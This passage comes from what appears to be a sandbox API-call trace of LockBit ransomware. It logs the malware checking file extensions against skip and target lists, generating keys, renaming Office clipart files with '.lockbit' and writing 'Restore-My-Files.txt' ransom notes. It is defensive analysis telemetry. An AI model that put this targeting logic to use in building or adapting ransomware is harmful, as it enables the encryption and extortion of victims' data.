lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.574] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.574] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.575] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.575] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.575] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.575] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.575] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.575] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.lockbit") returned 72 [0106.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0106.575] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.575] malloc (_Size=0x40068) returned 0x3e70008 [0106.576] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7862) returned 1 [0106.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0106.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0106.577] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0106.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.581] malloc (_Size=0xa6) returned 0x77d800 [0106.581] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.582] free (_Block=0x77d800) [0106.582] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a40fd00, ftCreationTime.dwHighDateTime=0x1bd4b27, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a40fd00, ftLastWriteTime.dwHighDateTime=0x1bd4b27, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00098_.WMF", cAlternateFileName="")) returned 1 [0106.582] lstrcmpiW (lpString1=".", lpString2="BL00098_.WMF") returned -1 [0106.582] lstrcmpiW (lpString1="..", lpString2="BL00098_.WMF") returned -1 [0106.582] PathFindExtensionW (pszPath="BL00098_.WMF") returned=".WMF" [0106.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.582] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.583] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00098_.WMF") returned 1 [0106.584] lstrcmpiW (lpString1="ntldr", lpString2="BL00098_.WMF") returned 1 [0106.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00098_.WMF") returned 1 [0106.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00098_.WMF") returned 1 [0106.584] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00098_.WMF") returned -1 [0106.584] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00098_.WMF") returned 1 [0106.584] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00098_.WMF") returned 1 [0106.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned=".WMF" [0106.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.584] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.584] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.586] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.586] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.lockbit") returned 72 [0106.586] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0106.587] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.587] malloc (_Size=0x40068) returned 0x3ef0008 [0106.587] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1012) returned 1 [0106.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0106.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0106.588] ReadFile (in: hFile=0x3ac, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.593] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.593] malloc (_Size=0xa6) returned 0x77d800 [0106.593] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.594] free (_Block=0x77d800) [0106.594] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.594] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.594] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x888a3600, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x888a3600, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00105_.WMF", cAlternateFileName="")) returned 1 [0106.594] lstrcmpiW (lpString1=".", lpString2="BL00105_.WMF") returned -1 [0106.594] lstrcmpiW (lpString1="..", lpString2="BL00105_.WMF") returned -1 [0106.594] PathFindExtensionW (pszPath="BL00105_.WMF") returned=".WMF" [0106.594] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.594] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.595] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.595] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.596] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00105_.WMF") returned 1 [0106.596] lstrcmpiW (lpString1="ntldr", lpString2="BL00105_.WMF") returned 1 [0106.596] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00105_.WMF") returned 1 [0106.596] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00105_.WMF") returned 1 [0106.596] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00105_.WMF") returned -1 [0106.596] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00105_.WMF") returned 1 [0106.596] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00105_.WMF") returned 1 [0106.596] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.596] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned=".WMF" [0106.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.597] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.597] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.598] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.598] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.598] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.lockbit") returned 72 [0106.598] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0106.602] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.602] malloc (_Size=0x40068) returned 0x3d70048 [0106.603] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=880) returned 1 [0106.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0106.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0106.605] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0106.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.607] malloc (_Size=0xa6) returned 0x77d800 [0106.607] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.608] free (_Block=0x77d800) [0106.608] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.608] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.608] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.608] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0f5c00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d0f5c00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x27a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00122_.WMF", cAlternateFileName="")) returned 1 [0106.608] lstrcmpiW (lpString1=".", lpString2="BL00122_.WMF") returned -1 [0106.608] lstrcmpiW (lpString1="..", lpString2="BL00122_.WMF") returned -1 [0106.608] PathFindExtensionW (pszPath="BL00122_.WMF") returned=".WMF" [0106.608] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.608] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.608] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".theme", 